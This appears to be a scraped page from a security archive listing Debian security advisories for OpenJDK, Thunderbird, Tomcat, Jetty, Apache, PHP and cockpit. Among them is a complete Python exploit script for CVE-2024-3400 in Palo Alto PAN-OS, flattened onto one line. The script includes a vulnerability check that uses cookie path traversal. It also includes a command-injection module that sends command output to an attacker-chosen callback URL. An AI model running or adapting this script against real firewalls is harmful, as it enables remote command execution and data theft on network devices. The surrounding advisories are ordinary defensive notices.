Debian Linux Security Advisory 5672-1 - Several vulnerabilities have been discovered in the OpenJDK Java runtime, which may result in denial of service or information disclosure.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA512

- -------------------------------------------------------------------------  
Debian Security Advisory DSA-5672-1                   security@debian.org  
https://www.debian.org/security/                       Moritz Muehlenhoff  
April 22, 2024                        https://www.debian.org/security/faq  
- -------------------------------------------------------------------------

Package        : openjdk-17  
CVE ID         : CVE-2024-21011 CVE-2024-21012 CVE-2024-21068 CVE-2024-21094

Several vulnerabilities have been discovered in the OpenJDK Java runtime,  
which may result in denial of service or information disclosure.

For the oldstable distribution (bullseye), these problems have been fixed  
in version 17.0.11+9-1~deb11u1.

For the stable distribution (bookworm), these problems have been fixed in  
version 17.0.11+9-1~deb12u1.

We recommend that you upgrade your openjdk-17 packages.

For the detailed security status of openjdk-17 please refer to  
its security tracker page at:  
https://security-tracker.debian.org/tracker/openjdk-17

Further information about Debian Security Advisories, how to apply  
these updates to your system and frequently asked questions can be  
found at: https://www.debian.org/security/

Mailing list: debian-security-announce@lists.debian.org  
-----BEGIN PGP SIGNATURE-----

iQIzBAEBCgAdFiEEtuYvPRKsOElcDakFEMKTtsN8TjYFAmYmcqoACgkQEMKTtsN8  
TjYjzw/+MwGuvMC25asTYdrFA08Ir85aJ3hj14N43NoquAO/i9NIZaGYv7sau1xp  
boHiGg9QnDkXbV/5CGwsnRUNsvHrgC8t17Tjebh795s/v22Z+77pePTiaXC9Sj06  
lnVaDYX/WWfCSJL2p5teKgzL032hN4Crmihkmg/wSvwSi8q4k/lIMBZFg2JfTZS3  
buZiqaviUH0jJZUnbJYtlPasC9YNnCO9WAzHTC1TfLDS9ATLymCHAeBs0Heny2W1  
V68xbN+nVsAa6+kwUZCU8wppwaE+Uvnc+SO4mra8PrhPdw//AiU8/ZplKH2fNYfA  
lgkId/itLJKqlELvm7h8WhGvi4QvbDvB/QYveW8phYwWWeoHPOUGLqJZDbxk0w96  
PjTDgiwHzkjMKSp+Y9Eb2XKrhz2l5poBPsKy8e0qkF+I+euALwoEPZs2YZ3jcIE6  
l5RR00UiYPLZLfvZ93HQKjlo85QyjByruHWIxo3hrK1oFo71vMFsBXpafRP6qOre  
txnkSd/i1yzeHTZmmyUnIF05G5EUVMTaRBrsCVTONA6rAK69+GQrWj87bkrhZEcu  
vuuyoFiNDi4zEO09y70QbIyrPjc0bD7gKdvxKVlzTovdIYcU7paMIVdFmIliF4GQ  
lkO5hWE+7aUZzr0JvD2TilUGUXRheqE0e6e3CbGZnNmCMi7doIQ=  
=seiM  
-----END PGP SIGNATURE-----

Debian Security Advisory 5672-1

Debian Linux Security Advisory 5671-1 - Several vulnerabilities have been discovered in the OpenJDK Java runtime, which may result in denial of service or information disclosure.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA512

- -------------------------------------------------------------------------  
Debian Security Advisory DSA-5671-1                   security@debian.org  
https://www.debian.org/security/                       Moritz Muehlenhoff  
April 22, 2024                        https://www.debian.org/security/faq  
- -------------------------------------------------------------------------

Package        : openjdk-11  
CVE ID         : CVE-2024-21011 CVE-2024-21012 CVE-2024-21068 CVE-2024-21085   
                 CVE-2024-21094

Several vulnerabilities have been discovered in the OpenJDK Java runtime,  
which may result in denial of service or information disclosure.

For the oldstable distribution (bullseye), these problems have been fixed  
in version 11.0.23+9-1~deb11u1.

We recommend that you upgrade your openjdk-11 packages.

For the detailed security status of openjdk-11 please refer to  
its security tracker page at:  
https://security-tracker.debian.org/tracker/openjdk-11

Further information about Debian Security Advisories, how to apply  
these updates to your system and frequently asked questions can be  
found at: https://www.debian.org/security/

Mailing list: debian-security-announce@lists.debian.org  
-----BEGIN PGP SIGNATURE-----

iQIzBAEBCgAdFiEEtuYvPRKsOElcDakFEMKTtsN8TjYFAmYmH9YACgkQEMKTtsN8  
TjaKAA//fw8DPGbtJdWNqxvG+mFaHqdTCuy+kBfa63IJ2pdM0q8e4vI4QwwvKYks  
dFsDL4u/wX9VKSUxcFyrX1lfP1gcZkFClVGDU2u/t4rbDCNpyRHRxxO7On9Q/EJ8  
cRH7ncEi1BeSSMYgPAF2Bnm8KNDD4TRBH94MMpppAopPsesBsibP/8oNjjk2X2MT  
Cdt0VZ+NH+lb93OW2bKyd0toU75I1/yuN4Xc4m+iUgDFnYLadkYBiUoyL/p2BMas  
myXpEgxrdOj4x/yiOCi8LwIwFkB2BnQtjYfYKk5c1l4c40TaGzkYHHFTfTLYsq5i  
LSzPRwMnysiHPZvVQTMaUQrGZRG1Qm6v5mrvSpLq8uiypz9gDTY1xmJ01U+iDnfl  
lpBhqXjhHOdep3XOT0pbcHYtd4xuO2nxiNb0rv3NyfJfEUqe3y1gaa0GOuBPzKJV  
jda9g4lzu0GLGxuQ+fHfPKjXMJRyeVisis1XxZ1kEcJIArOE+vOwngTwpQf1n0Pm  
8gVGKmZm5pmbC/CQCy9gai6UBeaH13cIYxQylL6lD1kBjardVAB0C3u3jaNKGPlJ  
Rqn2ZhV+XahLlK93D4bOEEg5eh4U5iNRG4OwiN/iIQmSoSUDcFRktLuEQQSwkQ+d  
O5KAw8SwwpPgKwIM176O+xeCdkPPjWbBosnHmkrvfEmw3zWFRNY=  
=i85/  
-----END PGP SIGNATURE-----

Debian Security Advisory 5671-1

Debian Linux Security Advisory 5670-1 - Multiple security issues were discovered in Thunderbird, which could result in denial of service or the execution of arbitrary code.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA512

- -------------------------------------------------------------------------  
Debian Security Advisory DSA-5670-1                   security@debian.org  
https://www.debian.org/security/                       Moritz Muehlenhoff  
April 22, 2024                        https://www.debian.org/security/faq  
- -------------------------------------------------------------------------

Package        : thunderbird  
CVE ID         : CVE-2024-2609 CVE-2024-3302 CVE-2024-3852 CVE-2024-3854  
                 CVE-2024-3857 CVE-2024-3859 CVE-2024-3861 CVE-2024-3864

Multiple security issues were discovered in Thunderbird, which could  
result in denial of service or the execution of arbitrary code.

For the oldstable distribution (bullseye), this problem has been fixed  
in version 1:115.10.1-1~deb11u1.

For the stable distribution (bookworm), this problem has been fixed in  
version 1:115.10.1-1~deb12u1.

We recommend that you upgrade your thunderbird packages.

For the detailed security status of thunderbird please refer to  
its security tracker page at:  
https://security-tracker.debian.org/tracker/thunderbird

Further information about Debian Security Advisories, how to apply  
these updates to your system and frequently asked questions can be  
found at: https://www.debian.org/security/

Mailing list: debian-security-announce@lists.debian.org  
-----BEGIN PGP SIGNATURE-----

iQIzBAEBCgAdFiEEtuYvPRKsOElcDakFEMKTtsN8TjYFAmYmEi4ACgkQEMKTtsN8  
TjYidA/+PvxudnviZz8CZMPFH9PTFAVbrhZKW0Ns4GS+Y4+oSZJycTroYQSukfE0  
Suame/p8jYTCkeKhQ+oF1cjPgVbEmgpAx4aMXHeRTMpsTNUA/S1xdcnqalEWL/4m  
TJJuB2jLIdq8b0fKnbsK4jItc5N5IyXKubQ51SUl+IkVi3LCohChMhv8lx3XfSZd  
p/x5JXXkoG7fbjVcpy+G55hS3DemUGe9p2fZyT7cXdeq7C6KhKbf42i41iZysc7h  
Osa/rYVw1rCAoDg46/lBEoUydXsagYQMk9BQkWLygwn45zll2JBDL/shjwTTUL97  
jj166GcimA3L3NA6tt062XDrlF2dELxSbtX6Cgef+6BBDt8f4xsk+AjCLdZN5bQ4  
/C7DVhzrLUecTxp93vapLsmQAlSc/7F3aXJD6mNfrIX4qG1iREhjt09bxmuDua5W  
du4ppHPqTioWPP1aCFnXp1G3UFkcW/Q6gp54sfJOWla+S2bBaq/2AS4qMq8rCz1Y  
I52XYMWMQ4lCfC2ObeGfkPaOLWcYIGn8s8tYCp1ke6AHbKhivz+ccUZ5nZT6GdL9  
kBitHRL4bPKgXXKKUYxdNwOngVV6AuoX+JRhwyFH4vmKjBH6YnqiK8WHUd0sWXsI  
3QFiYZCplDAL30vLOw8vk5oq2j2T6SgmzO/AkOI+0oN7MaB7F8U=  
=9I0b  
-----END PGP SIGNATURE-----

Debian Security Advisory 5670-1

Palo Alto PAN-OS versions prior to 11.1.2-h3 command injection and arbitrary file creation exploit.

    # Exploit Title: Palo Alto PAN-OS  < v11.1.2-h3  - Command Injection and Arbitrary File Creation# Date: 21 Apr 2024# Exploit Author: Kr0ff# Vendor Homepage: https://security.paloaltonetworks.com/CVE-2024-3400# Software Link: -# Version: PAN-OS 11.1 < 11.1.0-h3, < 11.1.1-h1, < 11.1.2-h3 #          PAN-OS 11.0 < 11.0.0-h3, < 11.0.1-h4, < 11.0.2-h4, < 11.0.3-h10, < 11.0.4-h1#          PAN-OS 10.2 < 10.2.0-h3, < 10.2.1-h2, < 10.2.2-h5, < 10.2.3-h13, < 10.2.4-h16, < 10.2.5-h6, < 10.2.6-h3, < 10.2.7-h8, < 10.2.8-h3, < 10.2.9-h1# Tested on: Debian# CVE : CVE-2024-3400#!/usr/bin/env python3import systry:    import argparse    import requestsexcept ImportError:    print("Missing dependencies, either requests or argparse not installed")    sys.exit(2)# https://attackerkb.com/topics/SSTk336Tmf/cve-2024-3400/rapid7-analysis # https://labs.watchtowr.com/palo-alto-putting-the-protecc-in-globalprotect-cve-2024-3400/def check_vuln(target: str, file: str) -> bool:    ret = False        uri = "/ssl-vpn/hipreport.esp"        s = requests.Session()    r = ""        headers = {                "User-Agent" : \                        "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36", # Windows 10 Chrome 118.0.0.0                "Content-Type": "application/x-www-form-urlencoded",                "Cookie": \                        f"SESSID=../../../var/appweb/sslvpndocs/global-protect/portal/images/{file}"    }         headers_noCookie = {                "User-Agent" : \                        "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36" # Windows 10 Chrome 118.0.0.0    }        if not "http://" or not "https://" in target:        target = "http://" + target           try:            r = s.post( (target + uri), verify=False, headers=headers, timeout=10 )        except requests.exceptions.Timeout or requests.ConnectionError as e:            print(f"Request timed out for \"HTTP\" !{e}")        print("Trying with \"HTTPS\"...")        target = "https://" + target        try:            r = s.post( (target + uri), verify=False, headers=headers, timeout=10 )        except requests.exceptions.Timeout or requests.ConnectionError as e:            print(f"Request timed out for \"HTTPS\"")            sys.exit(1)    else:        r = s.post( (target + uri), verify=False, headers=headers, timeout=10 )    if r.status_code == 200:        r = s.get( (target + f"/global-protect/portal/images/{file}"), verify=False, headers=headers_noCookie, timeout=10 )        if r.status_code == 403:            print("Target vulnerable to CVE-2024-3400")            ret = True    else:        return ret    return ret        def cmdexec(target: str, callback_url: str, payload: str) -> bool:    ret = False    p = ""    if " " in payload:        p = payload.replace(" ", "${IFS)")    uri = "/ssl-vpn/hipreport.esp"    headers = {                "User-Agent" : \                        "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36", # Windows 10 Chrome 118.0.0.0                "Content-Type": "application/x-www-form-urlencoded",                "Cookie": \                        f"SESSID=../../../../opt/panlogs/tmp/device_telemetry/minute/attack782`{callback_url}?r=$({payload})`"            }     s = requests.Session()    r = ""        if not "http://" or not "https://" in target:        target = "http://" + target           try:            r = s.post( (target + uri), verify=False, headers=headers, timeout=10 )        except requests.exceptions.Timeout or requests.ConnectionError as e:            print(f"Request timed out for \"HTTP\" !{e}")        print("Trying with \"HTTPS\"...")        target = "https://" + target        try:            r = s.post( (target + uri), verify=False, headers=headers, timeout=10 )        except requests.exceptions.Timeout or requests.ConnectionError as e:            print(f"Request timed out for \"HTTPS\"")            sys.exit(1)    else:        r = s.post( (target + uri), verify=False, headers=headers, timeout=10 )    if not "Success" in r.text:        return ret    else:        ret = True    return ret#Initilize parser for argumentsdef argparser(selection=None):    parser = argparse.ArgumentParser( description='CVE-2024-3400 - Palo Alto OS Command Injection' )        subparser = parser.add_subparsers( help="Available modules", dest="module")        exploit_subp = subparser.add_parser( "exploit", help="Exploit module of script")    exploit_subp.add_argument( "-t", "--target",help="Target to send payload to", required=True )    exploit_subp.add_argument( "-p", "--payload", help="Payload to send (e.g: whoami)", required=True )    exploit_subp.add_argument( "-c", "--callbackurl", help="The callback url such as burp collaborator or similar", required=True )    #---------------------------------------    check_subp = subparser.add_parser( "check", help="Vulnerability check module of script" )    check_subp.add_argument( "-t", "--target", help="Target to check if vulnerable", required=True )    check_subp.add_argument( "-f", "--filename", help="Filename of the payload (e.g \"exploitCheck.exp\"", required=True )    args = parser.parse_args(selection)    args = parser.parse_args(args=None if sys.argv[1:] else ["-h"])        if args.module == "exploit":            cmdexec(args.target, args.callbackurl, args.payload)    if args.module == "check":        check_vuln(args.target, args.filename)if __name__ == "__main__":    argparser()    print("Finished !")

Palo Alto PAN-OS Command Execution / Arbitrary File Creation

Debian Linux Security Advisory 5665-1 - Several security vulnerabilities have been discovered in the Tomcat servlet and JSP engine.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA512

- -------------------------------------------------------------------------  
Debian Security Advisory DSA-5665-1                   security@debian.org  
https://www.debian.org/security/                          Markus Koschany  
April 17, 2024                        https://www.debian.org/security/faq  
- -------------------------------------------------------------------------

Package        : tomcat10  
CVE ID         : CVE-2023-46589 CVE-2024-23672 CVE-2024-24549  
Debian Bug     : 1057082 1066877 1066878

Several security vulnerabilities have been discovered in the Tomcat  
servlet and JSP engine.

CVE-2023-46589

    Tomcat 10 did not correctly parse HTTP trailer headers. A trailer header  
    that exceeded the header size limit could cause Tomcat to treat a single  
    request as multiple requests leading to the possibility of request  
    smuggling when behind a reverse proxy.

CVE-2024-24549

     Denial of Service due to improper input validation vulnerability for  
     HTTP/2. When processing an HTTP/2 request, if the request exceeded any of  
     the configured limits for headers, the associated HTTP/2 stream was not  
     reset until after all of the headers had been processed.

CVE-2024-23672

     Denial of Service via incomplete cleanup vulnerability. It was possible  
     for WebSocket clients to keep WebSocket connections open leading to  
     increased resource consumption.

For the stable distribution (bookworm), these problems have been fixed in  
version 10.1.6-1+deb12u2.

We recommend that you upgrade your tomcat10 packages.

For the detailed security status of tomcat10 please refer to  
its security tracker page at:  
https://security-tracker.debian.org/tracker/tomcat10

Further information about Debian Security Advisories, how to apply  
these updates to your system and frequently asked questions can be  
found at: https://www.debian.org/security/

Mailing list: debian-security-announce@lists.debian.org  
-----BEGIN PGP SIGNATURE-----

iQKTBAEBCgB9FiEErPPQiO8y7e9qGoNf2a0UuVE7UeQFAmYgQdpfFIAAAAAALgAo  
aXNzdWVyLWZwckBub3RhdGlvbnMub3BlbnBncC5maWZ0aGhvcnNlbWFuLm5ldEFD  
RjNEMDg4RUYzMkVERUY2QTFBODM1RkQ5QUQxNEI5NTEzQjUxRTQACgkQ2a0UuVE7  
UeRxWg/9HomYTHhhPpVv0BwAECG399S7910TgHArULALOMKdpHjJLmi4PvNoB/u+  
7KwKWdpULjOr4z0YMmxyI6eMHYEgJAEHlZpSzGRt2Sue12g0ouSLJ7//jvfJcI6b  
5JnzFdZQQYoGocfIgHczcKGooMDjaujmTuf/bA2tVV+X5gO0QYWGnbr7MLd0y4PC  
a8KaLGNJcGDSkN2nCFgEi2mMBZP++sEA+TyJJV6cOHyvnXEoD9/wk6IwFos4kDQT  
y3qbYtRGUwtg/frQ7iS8EtkpK8vHcjflPrtQTvfGLALdXV50RpOOgeIIKOecFs2v  
PtJp3dEg4L/cWNlPwLVsisYN6gC+pa6z3GoAg5J2O5d9xar+pJQeYLx9WozlGvkL  
NVVzvj6p30yQOxINtes2xG9pqPOM7alLQl6VjUxm8DVSCne4NKlK32HAyh8Uxi4R  
V+3nqTPRNeN+3bLeztCOeo/9oxSTkXDDqB9TT3rFooZpP3bpaUH2B37lOONcg/55  
+WTTgh8bM8f8MlmOMYqz3IihrxW0WJlgE5oR2vCNwxb8a3ec4GhwdCV5/Sr3LxEJ  
YkURiWyUE37/OuZB/TnTg26HWcctJJpV+//JOTslRWBr0qXIg6PrMIwYYtTYZwXp  
U8mmX8cIQVdHQoFvYrJuQz4J74sjDRIddo5rWB7bXXJQEuxcBrs=  
=WEw1  
-----END PGP SIGNATURE-----

Debian Security Advisory 5665-1

Debian Linux Security Advisory 5664-1 - Jetty 9 is a Java based web server and servlet engine. It was discovered that remote attackers may leave many HTTP/2 connections in ESTABLISHED state (not closed), TCP congested and idle. Eventually the server will stop accepting new connections from valid clients which can cause a denial of service.

    -----BEGIN PGP SIGNED MESSAGE-----Hash: SHA512- -------------------------------------------------------------------------Debian Security Advisory DSA-5664-1                   security@debian.orghttps://www.debian.org/security/                          Markus KoschanyApril 17, 2024                        https://www.debian.org/security/faq- -------------------------------------------------------------------------Package        : jetty9CVE ID         : CVE-2024-22201Jetty 9 is a Java based web server and servlet engine. It was discovered thatremote attackers may leave many HTTP/2 connections in ESTABLISHED state (notclosed), TCP congested and idle. Eventually the server will stop accepting newconnections from valid clients which can cause a denial of service.For the oldstable distribution (bullseye), this problem has been fixedin version 9.4.50-4+deb11u2.For the stable distribution (bookworm), this problem has been fixed inversion 9.4.50-4+deb12u3.We recommend that you upgrade your jetty9 packages.For the detailed security status of jetty9 please refer toits security tracker page at:https://security-tracker.debian.org/tracker/jetty9Further information about Debian Security Advisories, how to applythese updates to your system and frequently asked questions can befound at: https://www.debian.org/security/Mailing list: debian-security-announce@lists.debian.org-----BEGIN PGP SIGNATURE-----iQKTBAEBCgB9FiEErPPQiO8y7e9qGoNf2a0UuVE7UeQFAmYgPqhfFIAAAAAALgAoaXNzdWVyLWZwckBub3RhdGlvbnMub3BlbnBncC5maWZ0aGhvcnNlbWFuLm5ldEFDRjNEMDg4RUYzMkVERUY2QTFBODM1RkQ5QUQxNEI5NTEzQjUxRTQACgkQ2a0UuVE7UeS8Wg/+JvDyNdRq1Tu6rEqfHprMuxVifvPSH4RefpWMVY1MUIwRSxCyL9GEKCtuq0a+Vf/JycNVbTcRB0n/UpgFdCCWE6dUngLIoYX/SmA+dXKLN9a+FIKj/aivOvOrCUEkaJiVBjARYoBxDzoLG8STAJkxJvCAIduOSZ4Pr3iaZ+3+mHLpz38aAHz7QCXSNoqaD66hMTCVPnVTTr3CvrhCIjcdxQRteJwkJ0XxT5WxYSBmVuB+zEAxHUt6ocv25bMel+B4OMcNrRrdQiUtqAF2i7ktAPO2HUo5+9kxYCwkB1DbgIEhdtkA6aBtTYZ0ZJbx4kV206DrQO7PjLzbY6RA2o2EiNb1zEZlaaFuGq6ctIpR52PplC0sEPUTVbDHLlDAQUIXzmmJGhD2etF5dpknbBTcAhUjGebCiasqwZ8HWiVUeIEwi89je7+CThjB3phSjyzqZivdkpYiZTApy3UU3lzXHViCtTIverkaQNoYExWVCKihvMRtSAlhw4b0ukEt+PNzrgl2N0M3bYh1oEh+TGqiP961Je38l5756wKLSxgzfTwTlrPmH6BFwhkFEnMxzjX4jvRWkVC2Yz4/DiJnRnAEjS3iOsvvDnP/lZkWZOXMT3TY0bRJSwUuEgCcNPF/PE/q6KRtzyxJLuTOFRwk/xob/q4GucD+RuqwHEC2w3fN7WE==HK3G-----END PGP SIGNATURE-----

Debian Security Advisory 5664-1

Debian Linux Security Advisory 5655-2 - The update of cockpit released in DSA 5655-1 did not correctly build binary packages due to unit test failures when building against libssh 0.10.6. This update corrects that problem.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA512

- -------------------------------------------------------------------------  
Debian Security Advisory DSA-5655-2                   security@debian.org  
https://www.debian.org/security/                     Salvatore Bonaccorso  
April 16, 2024                        https://www.debian.org/security/faq  
- -------------------------------------------------------------------------

Package        : cockpit  
Debian Bug     : 1069059

The update of cockpit released in DSA 5655-1 did not correctly built  
binary packages due to unit test failures when building against libssh  
0.10.6. This update corrects that problem.

For the stable distribution (bookworm), this problem has been fixed in  
version 287.1-0+deb12u2.

We recommend that you upgrade your cockpit packages.

For the detailed security status of cockpit please refer to its security  
tracker page at:  
https://security-tracker.debian.org/tracker/cockpit

Further information about Debian Security Advisories, how to apply  
these updates to your system and frequently asked questions can be  
found at: https://www.debian.org/security/

Mailing list: debian-security-announce@lists.debian.org  
-----BEGIN PGP SIGNATURE-----

iQKTBAEBCgB9FiEERkRAmAjBceBVMd3uBUy48xNDz0QFAmYe2O9fFIAAAAAALgAo  
aXNzdWVyLWZwckBub3RhdGlvbnMub3BlbnBncC5maWZ0aGhvcnNlbWFuLm5ldDQ2  
NDQ0MDk4MDhDMTcxRTA1NTMxRERFRTA1NENCOEYzMTM0M0NGNDQACgkQBUy48xND  
z0QK0RAAkGuh1qsgWCu60JxMYZjfeSyA/w+MlKlwANHCA74QbsvqOyadjrtdxRjK  
EgKRs8Gz7H8o3bpuVE/4mWkIyDjsn9yZeFlro/6wf3yGsxEL7I2MlKWa56A6hNJD  
4dCgdo9gKqcDR7YOpknemN7F8VElUINFjBHzQ6vzm+HMneg4JC3Nhh1TZfNj/trT  
em/LLoMb9VDHutpv8T0OQwt1tgUxfOfxKDFTsLzjxzYwBfAHqJPu/MZrS1kj15iU  
HK9nouDw7hYOx0FzTBhlobNnLod8kYN+McUMkiux84lv8PyYE3sxiDlTYcGeG+0n  
XQ4FHxB6wdolaGKRCwt8t3Bt1uTPvbDYwii6eDmjNLrSFnjbJlfihaVkng9fXb6R  
kfRHRWhcT15/Yv8GmJUAN7/vNlzPEAXkbXmP3O/MmrLymjsyC4p2Oo8PfKn1biK0  
K0s0BrGMd60DvrD6L07ntF0IfF7qoNvYwZLF3ELsXe/h9dlaNtqDHMG2O1OZNB/M  
VYW6S3reytzexMuqUtKPB2kAZeuiIK6iTJNLU7v1ZWPfHp2ApK3yGxTCXrNj3Ufa  
kO7Tw0g6w3xIvlxLjHPZ/V9TxBB75i2PmxQMLIk4VjAMY93I6XmESFhI4Me94oQw  
xYRGVjCCHd8J5Ky4VTgnS66Um2KUkF+nGCZLudTDVeyPzNBh9hk=  
=b5VL  
-----END PGP SIGNATURE-----

Debian Security Advisory 5655-2

Debian Linux Security Advisory 5662-1 - Multiple vulnerabilities have been discovered in the Apache HTTP server, which may result in HTTP response splitting or denial of service.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA512

- -------------------------------------------------------------------------  
Debian Security Advisory DSA-5662-1                   security@debian.org  
https://www.debian.org/security/                       Moritz Muehlenhoff  
April 16, 2024                        https://www.debian.org/security/faq  
- -------------------------------------------------------------------------

Package        : apache2  
CVE ID         : CVE-2023-31122 CVE-2023-38709 CVE-2023-43622  
                 CVE-2023-45802 CVE-2024-24795 CVE-2024-27316

Multiple vulnerabilities have been discovered in the Apache HTTP server,  
which may result in HTTP response splitting or denial of service.

For the oldstable distribution (bullseye), these problems have been fixed  
in version 2.4.59-1~deb11u1.

For the stable distribution (bookworm), these problems have been fixed in  
version 2.4.59-1~deb12u1.

We recommend that you upgrade your apache2 packages.

For the detailed security status of apache2 please refer to  
its security tracker page at:  
https://security-tracker.debian.org/tracker/apache2

Further information about Debian Security Advisories, how to apply  
these updates to your system and frequently asked questions can be  
found at: https://www.debian.org/security/

Mailing list: debian-security-announce@lists.debian.org  
-----BEGIN PGP SIGNATURE-----

iQIzBAEBCgAdFiEEtuYvPRKsOElcDakFEMKTtsN8TjYFAmYewy0ACgkQEMKTtsN8  
Tja35g//YmcqUVOEofpDGsuxzNCW4N4w/9UKJ3Qevb+/+1Vr+HiA1YCckFIOAEVe  
Utic9aNRH3ujZpUWMSW4BDAvRma/iirXSEiuPc6C8YAgjFo7olgAhBgvDEKyHsD1  
cRIVk4GkwL/de0axePNugR4bX+N+ZpQkCDm1i9S54L+LoS/n73MJLkY2LIxzxZi0  
SuQ//DiAa7Q6fwN5jl1emRA28KMm72luOndiL7WuO+EdCF8HmkwhQwk0fjryCxru  
9xHu+k/Xk0Xqnl4AXAe9ghCxxb6/sYrYJvIFR0RxNcViRuIwC+ce1TwISYSfUphu  
q8kvfXmllI+FhUGG88KJMLl/7SO1oEEfUEtmWantxmPIjcBbx0fMbWtGxphXlzVW  
/V7w9aqaHg3eBQIg+9EfFIW++/fk9HEHIRU5j98x7Du/KuMJQGv1T+8/diGOSzof  
yGALRvHiTaOZGmgs2d6ng1y3t21/UJbQD7dxsGEigdBxCim62FxPm701nQ+aAdd9  
OWOqJJi48Z9CLpyIqFIF3T1pJ3G2kU9rWocJ1gaJMIH28pimgIMD1pM79uNA9cIl  
uxvmpT+ND9vhI9iCI9in9z6HosrKDlHdTGW8DgYUJmJNVS5QWEr0ivxarhaxff1S  
1xGJrU+t+Bo7mYzhM6vgdOA7YQp13ljMSPPu9dyd+j6W0sFfQUU=  
=GLD7  
-----END PGP SIGNATURE-----

Debian Security Advisory 5662-1

Debian Linux Security Advisory 5661-1 - Multiple security issues were found in PHP, a widely-used open source general purpose scripting language which could result in secure cookie bypass, XXE attacks or incorrect validation of password hashes.

    -----BEGIN PGP SIGNED MESSAGE-----Hash: SHA512- -------------------------------------------------------------------------Debian Security Advisory DSA-5661-1                   security@debian.orghttps://www.debian.org/security/                       Moritz MuehlenhoffApril 15, 2024                        https://www.debian.org/security/faq- -------------------------------------------------------------------------Package        : php8.2CVE ID         : CVE-2023-3823 CVE-2023-3824 CVE-2024-2756 CVE-2024-3096Multiple security issues were found in PHP, a widely-used open sourcegeneral purpose scripting language which could result in secure cookiebypass, XXE attacks or incorrect validation of password hashes.For the stable distribution (bookworm), these problems have been fixed inversion 8.2.18-1~deb12u1.We recommend that you upgrade your php8.2 packages.For the detailed security status of php8.2 please refer toits security tracker page at:https://security-tracker.debian.org/tracker/php8.2Further information about Debian Security Advisories, how to applythese updates to your system and frequently asked questions can befound at: https://www.debian.org/security/Mailing list: debian-security-announce@lists.debian.org-----BEGIN PGP SIGNATURE-----iQIzBAEBCgAdFiEEtuYvPRKsOElcDakFEMKTtsN8TjYFAmYdfYMACgkQEMKTtsN8TjbrZxAAotqJ1fIulmY7fP/Ll2Gb/aoswnUqZTNiZH/yrzwX86cggI61EaWXc/JW7O5i7+U4y63ZIl5M6HVFk5bNgnj6Rwl5bT+jz8dbqLKkphIkT0754h1bdXCaW73riiNztNclAITPYMOntY7TEWZuqS2p4cNjUuHYoPiqCLU8ASMoi/z2DHFWBc6uBLRRRqbhbdFbWeekzc6nt+JZmEVD9JLXsh8kO4/f5o1pbCx6pYerWM1Win5AW6ZBSNMd5xO5DTP3F/RX7BEyH7rTQ0y2TRCY4qk2LKG4cojqidgHIpCiTiFiKvk9W3EJZdKebrzHyBgEixzCImvYze68j0M0ruxWiTTozKEn9Tj7DSPNoD+vB6U8kGAqmG3b5q+pw9BSCQ+AZ25HvDqdasH8gaj8Ji4xAhWxVutQRrSbhcf3xKu8Y6taz3ANIRXBmgjEARhK9p4b66KauAxG5GavWQQQprcbzt0deGUK6WkxigQ04l38kIrD9XIXnMHBEH4/Aas8E6zv8+j+18RdPaSGDGTAvuJD/C9GQjWfIvRXYVjUKarlWgtrgDoxGIMlOIHhRwgyJdZzJAx2vAY2o1CYmtIS59zReqwK+rAtogFi2RIoruVPGLccgxcqJOtvJF7MXGBAVp+3Wi4SFK5QHu1ISlngw+LkNJdkz1yXcUVI6vLt0QQEt94==xxUv-----END PGP SIGNATURE-----

Debian Security Advisory 5661-1

Debian Linux Security Advisory 5660-1 - Multiple security issues were found in PHP, a widely-used open source general purpose scripting language which could result in secure cookie bypass, XXE attacks or incorrect validation of password hashes.

    -----BEGIN PGP SIGNED MESSAGE-----Hash: SHA512- -------------------------------------------------------------------------Debian Security Advisory DSA-5660-1                   security@debian.orghttps://www.debian.org/security/                       Moritz MuehlenhoffApril 15, 2024                        https://www.debian.org/security/faq- -------------------------------------------------------------------------Package        : php7.4CVE ID         : CVE-2023-3823 CVE-2023-3824 CVE-2024-2756 CVE-2024-3096Multiple security issues were found in PHP, a widely-used open sourcegeneral purpose scripting language which could result in secure cookiebypass, XXE attacks or incorrect validation of password hashes.For the oldstable distribution (bullseye), these problems have been fixedin version 7.4.33-1+deb11u5.We recommend that you upgrade your php7.4 packages.For the detailed security status of php7.4 please refer toits security tracker page at:https://security-tracker.debian.org/tracker/php7.4Further information about Debian Security Advisories, how to applythese updates to your system and frequently asked questions can befound at: https://www.debian.org/security/Mailing list: debian-security-announce@lists.debian.org-----BEGIN PGP SIGNATURE-----iQIzBAEBCgAdFiEEtuYvPRKsOElcDakFEMKTtsN8TjYFAmYdfYIACgkQEMKTtsN8Tjavcw//TgnidCQ8c0hut2Ni6PP87fZH1uZZM+gAjUxS46UpNjsDtlu9WwXAxH09+uq0tg/dvKQLkC5W5gnUBiYhiOVoo9U75QP8oK2EYXyswXuEsb9tUhI/hEYr7KYaNHPRbSxZoowi6hKpXXpjoXc/+J9nghykSL9WeADJw4qP6QTclN274IfSujpmx6z+YqApbtW8wzACmHpdvXfCge09NHiN0Z/U8mpd99JBNIYGJGaSDmGNrnGMzBhOms+PTCqQQZPWgWh4RlggNSlslEadGN1huf1KpdHlPvSEfRavmzloX1Vt+XUrJM47nkD3y6y5TtckhGm7horXlskSovkNQZoa5G8NhAT1trzhfP07QJWJBrcc8MZzJQYiwlqZAf/zY8/UcusrJj3Y8BdkfbdWb69PA6sC2qTDuj48p7adgYBZ5YOwmrC4dcwdRd9laGqnZAhk1htX19Gzt1gYL2wDPMU+2x+F0rbemXGS6UwRmrkSlTiWVka+T5y+JpC8lLXFR2dwF2KAdUK4dWPd5QUrNb0Tk9dBcEZuyLRevindp7gCKLx/1y/RsrNxT8b1yW5yUp9jtePFa83+jNyojvURlC0SAgTcwEUhltob4vsTAccZZSza3cxOlqzC7ysNd0TKz20rTZFKreygYyIXfmHHaWoYbiK5IEy1ogOVho9SXUYJ7Mc==ZcwU-----END PGP SIGNATURE-----

Tag

#debian